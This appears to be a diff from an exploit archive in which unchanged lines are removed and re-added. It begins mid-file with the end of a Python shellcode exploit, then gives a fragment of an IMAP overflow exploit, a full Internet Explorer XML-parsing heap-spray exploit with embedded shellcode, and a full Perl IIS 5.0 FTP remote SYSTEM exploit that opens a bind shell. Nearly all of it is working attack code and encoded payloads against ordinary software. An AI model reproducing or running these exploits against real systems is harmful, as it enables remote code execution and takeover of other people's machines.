+"\x4c\x30\x4b\x6e\x6b\x43\x6f\x45\x4c\x66\x61\x78\x6b\x66\x63\x76"
-"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50"
+"\x4c\x4c\x4b\x6c\x49\x42\x4c\x71\x34\x65\x4c\x50\x61\x48\x43\x50"
-"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64"
+"\x31\x6b\x6b\x30\x64\x4c\x4b\x50\x43\x70\x30\x4e\x6b\x31\x50\x64"
-"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63"
+"\x4c\x6c\x4b\x74\x30\x47\x6c\x6e\x4d\x6e\x6b\x63\x70\x75\x58\x63"
-"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b"
+"\x6e\x62\x48\x4c\x4e\x50\x4e\x74\x4e\x5a\x4c\x50\x50\x4b\x4f\x4b"
-"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70"
+"\x66\x30\x66\x30\x53\x33\x56\x73\x58\x66\x53\x30\x32\x75\x38\x70"
-"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a"
+"\x77\x53\x43\x54\x72\x33\x6f\x76\x34\x6b\x4f\x6e\x30\x62\x48\x6a"
-"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c"
+"\x6b\x38\x6d\x49\x6c\x67\x4b\x50\x50\x4b\x4f\x48\x56\x61\x4f\x6c"
-"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73"
+"\x49\x38\x65\x65\x36\x4b\x31\x4a\x4d\x47\x78\x43\x32\x32\x75\x73"
-"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c"
+"\x5a\x64\x42\x79\x6f\x38\x50\x75\x38\x7a\x79\x46\x69\x7a\x55\x6c"
-"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51"
+"\x6d\x66\x37\x59\x6f\x6e\x36\x76\x33\x30\x53\x30\x53\x50\x53\x51"
-"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62"
+"\x43\x42\x63\x70\x53\x51\x53\x53\x63\x4b\x4f\x4e\x30\x33\x56\x62"
-"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75"
+"\x48\x54\x51\x53\x6c\x61\x76\x52\x73\x4e\x69\x5a\x41\x6e\x75\x75"
-"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51"
+"\x38\x4d\x74\x66\x7a\x34\x30\x6a\x67\x32\x77\x6b\x4f\x79\x46\x51"
-"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c"
+"\x7a\x46\x70\x51\x41\x70\x55\x4b\x4f\x38\x50\x53\x58\x4e\x44\x4c"
-"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b"
+"\x6d\x66\x4e\x78\x69\x33\x67\x49\x6f\x6e\x36\x50\x53\x31\x45\x6b"
-"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79"
+"\x4f\x5a\x70\x75\x38\x4d\x35\x42\x69\x6b\x36\x30\x49\x71\x47\x79"
-"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f"
+"\x6f\x59\x46\x56\x30\x50\x54\x70\x54\x30\x55\x79\x6f\x48\x50\x4f"
-"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58"
+"\x63\x52\x48\x7a\x47\x70\x79\x59\x56\x54\x39\x51\x47\x59\x6f\x58"
-"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33"
+"\x56\x50\x55\x79\x6f\x58\x50\x52\x46\x73\x5a\x61\x74\x63\x56\x33"
-"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44"
+"\x58\x65\x33\x52\x4d\x4d\x59\x4b\x55\x33\x5a\x70\x50\x56\x39\x44"
-"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54"
+"\x69\x6a\x6c\x4d\x59\x59\x77\x71\x7a\x67\x34\x4c\x49\x7a\x42\x54"
-"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30"
+"\x71\x4b\x70\x79\x63\x4c\x6a\x4b\x4e\x52\x62\x64\x6d\x49\x6e\x30"
-"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c"
+"\x42\x56\x4c\x4d\x43\x4c\x4d\x72\x5a\x77\x48\x6c\x6b\x4c\x6b\x6c"
-"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51"
+"\x6b\x32\x48\x31\x62\x49\x6e\x6f\x43\x77\x66\x6b\x4f\x50\x75\x51"
-"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33"
+"\x54\x6b\x4f\x7a\x76\x61\x4b\x72\x77\x66\x32\x70\x51\x36\x31\x33"
-"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48"
+"\x61\x53\x5a\x65\x51\x72\x71\x61\x41\x30\x55\x41\x41\x79\x6f\x48"
-"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a"
+"\x50\x32\x48\x6c\x6d\x6e\x39\x45\x55\x58\x4e\x61\x43\x69\x6f\x6a"
-"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73"
+"\x76\x53\x5a\x39\x6f\x4b\x4f\x46\x57\x69\x6f\x6a\x70\x4e\x6b\x73"
-"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b"
+"\x67\x49\x6c\x6d\x53\x49\x54\x70\x64\x6b\x4f\x4b\x66\x61\x42\x6b"
-"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b"
+"\x4f\x48\x50\x33\x58\x4a\x4f\x58\x4e\x6d\x30\x35\x30\x33\x63\x4b"
-"\x4f\x6b\x66\x79\x6f\x58\x50\x68")
+"\x4f\x6b\x66\x79\x6f\x58\x50\x68")
-buffer+="\r\n\r\n"
+buffer+="\r\n\r\n"
-
+
-expl.send (buffer)
+expl.send (buffer)
-expl.close()
+expl.close()
-print "[+] Payload Sent, ph33r."
+print "[+] Payload Sent, ph33r."
-
+
-# milw0rm.com [2007-12-12]
+# milw0rm.com [2007-12-12]
--- a/platforms/windows/remote/663.py
+++ b/platforms/windows/remote/663.py
@ -42,6 +42,6 @@ sleep(3)
 s.send('A001 SELECT ' + buffer+'\r\n')
 data = s.recv(1024)
 s.close()
-print "\nDone! "
+print "\nDone! "
-
+
-# milw0rm.com [2004-11-29]
+# milw0rm.com [2004-11-29]
--- a/platforms/windows/remote/7410.htm
+++ b/platforms/windows/remote/7410.htm
@ -1,55 +1,55 @@
-<html>
+<html>
-<script>
+<script>
-
+
-	// k`sOSe 12/10/2008
+	// k`sOSe 12/10/2008
-	// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
+	// Tested on Vista SP1, Explorer 7.0.6001.18000 and Vista SP0, Explorer 7.0.6000.16386
- 	// Heap spray address adjusted for Vista - muts / offensive-security.com
+ 	// Heap spray address adjusted for Vista - muts / offensive-security.com
-	// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
+	// http://secmaniac.blogspot.com/2008/12/ms-internet-explorer-xml-parsing-remote.html
-	// http://www.offensive-security.com/0day/iesploit-vista.rar
+	// http://www.offensive-security.com/0day/iesploit-vista.rar
-	// windows/exec - 141 bytes
+	// windows/exec - 141 bytes
-	// http://www.metasploit.com                                                                    
+	// http://www.metasploit.com                                                                    
-	// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe    
+	// EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe    
-	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
+	var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
-  	var block = unescape("%u0c0c%u0c0c");
+  	var block = unescape("%u0c0c%u0c0c");
-	var nops = unescape("%u9090%u9090%u9090");
+	var nops = unescape("%u9090%u9090%u9090");
-
+
-
+
-	while (block.length < 81920) block += block;
+	while (block.length < 81920) block += block;
-	var memory = new Array();
+	var memory = new Array();
-	var i=0;
+	var i=0;
-	for (;i<1000;i++) memory[i] += (block + nops + shellcode);
+	for (;i<1000;i++) memory[i] += (block + nops + shellcode);
-
+
-	document.write("<iframe src=\"iframe.html\">");
+	document.write("<iframe src=\"iframe.html\">");
-
+
-</script>
+</script>
-
+
-
+
-</html>
+</html>
-
+
-
+
-<!-- iframe.html
+<!-- iframe.html
-
+
-<XML ID=I>
+<XML ID=I>
-	<X>
+	<X>
-		<C>
+		<C>
-			<![CDATA[
+			<![CDATA[
-				<image 
+				<image 
-					SRC=http://&#3084;&#3084;.xxxxx.org			
+					SRC=http://&#3084;&#3084;.xxxxx.org			
-				>
+				>
-			 ]]>
+			 ]]>
-			
+			
-		</C>
+		</C>
-	</X>
+	</X>
-</XML>
+</XML>
-
+
-<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
+<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
-	<XML ID=I>
+	<XML ID=I>
-	</XML>
+	</XML>
-
+
-	<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
+	<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
-	</SPAN>
+	</SPAN>
-</SPAN>
+</SPAN>
-
+
-->
+-->
-
+
-# milw0rm.com [2008-12-10]
+# milw0rm.com [2008-12-10]
--- a/platforms/windows/remote/9559.pl
+++ b/platforms/windows/remote/9559.pl
@ -1,144 +1,144 @@
-#!/usr/bin/perl
+#!/usr/bin/perl
-# IIS 5.0 FTP Server / Remote SYSTEM exploit 
+# IIS 5.0 FTP Server / Remote SYSTEM exploit 
-# Win2k SP4 targets 
+# Win2k SP4 targets 
-# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
+# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
-# Affects IIS6 with stack cookie protection 
+# Affects IIS6 with stack cookie protection 
-# Modded by muts, additional egghunter added for secondary larger payload
+# Modded by muts, additional egghunter added for secondary larger payload
-# Might take a minute or two for the egg to be found.
+# Might take a minute or two for the egg to be found.
-# Opens bind shell on port 4444
+# Opens bind shell on port 4444
-
+
-# http://www.offensive-security.com/0day/msftp.pl.txt
+# http://www.offensive-security.com/0day/msftp.pl.txt
-
+
-use IO::Socket; 
+use IO::Socket; 
-$|=1; 
+$|=1; 
-$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
+$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
-"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
+"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
-"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
+"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
-"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
+"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
-"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
+"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
-"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
+"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
-"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
+"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
-"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
+"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
-"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
+"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
-# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
+# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
-
+
-$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
+$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
-"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
+"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
-"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
+"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
-"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
+"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
-"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
+"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
-"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
+"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
-"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
+"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
-"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
+"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
-"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
+"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
-"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
+"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
-"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
+"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
-"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
+"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
-"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
+"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
-"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
+"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
-"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
+"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
-"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
+"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
-"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
+"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
-"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
+"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
-"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
+"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
-"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
+"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
-"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
+"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
-"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
+"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
-"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
+"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
-"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
+"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
-"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";
+"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";
-
+
-
+
-print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; 
+print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; 
-if ($#ARGV ne 1) { 
+if ($#ARGV ne 1) { 
-print "usage: iiz5.pl <target> <your local ip>\n"; 
+print "usage: iiz5.pl <target> <your local ip>\n"; 
-exit(0); 
+exit(0); 
-} 
+} 
-srand(time()); 
+srand(time()); 
-$port = int(rand(31337-1022)) + 1025; 
+$port = int(rand(31337-1022)) + 1025; 
-$locip = $ARGV[1]; 
+$locip = $ARGV[1]; 
-$locip =~ s/\./,/gi; 
+$locip =~ s/\./,/gi; 
-if (fork()) { 
+if (fork()) { 
-$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
+$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
-                              PeerPort => '21', 
+                              PeerPort => '21', 
-                              Proto    => 'tcp'); 
+                              Proto    => 'tcp'); 
-$patch = "\x7E\xF1\xFA\x7F";
+$patch = "\x7E\xF1\xFA\x7F";
-$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms 
+$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms 
-
+
-$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); 
+$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); 
-# top address of stack frame where shellcode resides, is hardcoded inside this block 
+# top address of stack frame where shellcode resides, is hardcoded inside this block 
-$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53" 
+$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53" 
-   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0"; 
+   ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0"; 
-
+
-# attack buffer 
+# attack buffer 
-$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. 
+$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. 
-   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. 
+   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. 
-   "HHHHIIII". 
+   "HHHHIIII". 
-$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN"; 
+$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x;                             
+print $x;                             
-print $sock "USER anonimoos\r\n"; 
+print $sock "USER anonimoos\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "PASS $shell\r\n";
+print $sock "PASS $shell\r\n";
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "USER anonimoos\r\n"; 
+print $sock "USER anonimoos\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "PASS $shell\r\n";
+print $sock "PASS $shell\r\n";
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-
+
-print $sock "USER anonymous\r\n"; 
+print $sock "USER anonymous\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "PASS anonymous\r\n"; 
+print $sock "PASS anonymous\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "MKD w00t$port\r\n"; 
+print $sock "MKD w00t$port\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) 
+print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "SITE $v\r\n"; 
+print $sock "SITE $v\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "SITE $v\r\n"; 
+print $sock "SITE $v\r\n"; 
-$x = <$sock>;
+$x = <$sock>;
-print $x; 
+print $x; 
-print $sock "SITE $v\r\n"; 
+print $sock "SITE $v\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "SITE $v\r\n"; 
+print $sock "SITE $v\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "CWD w00t$port\r\n"; 
+print $sock "CWD w00t$port\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "MKD CCC". "$c\r\n"; 
+print $sock "MKD CCC". "$c\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; 
+print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-# TRIGGER 
+# TRIGGER 
-print $sock "NLST $c*/../C*/\r\n"; 
+print $sock "NLST $c*/../C*/\r\n"; 
-$x = <$sock>; 
+$x = <$sock>; 
-print $x; 
+print $x; 
-while (1) {} 
+while (1) {} 
-} else { 
+} else { 
-my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); 
+my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); 
-die "Could not create socket: $!\n" unless $servsock; 
+die "Could not create socket: $!\n" unless $servsock; 
-my $new_sock = $servsock->accept(); 
+my $new_sock = $servsock->accept(); 
-while(<$new_sock>) { 
+while(<$new_sock>) { 
-print $_; 
+print $_; 
-} 
+} 
-close($servsock); 
+close($servsock); 
-} 
+} 
-#Cheerio, 
+#Cheerio, 
-# 
+# 
-#Kingcope
+#Kingcope
-
+
-# milw0rm.com [2009-09-01]
+# milw0rm.com [2009-09-01]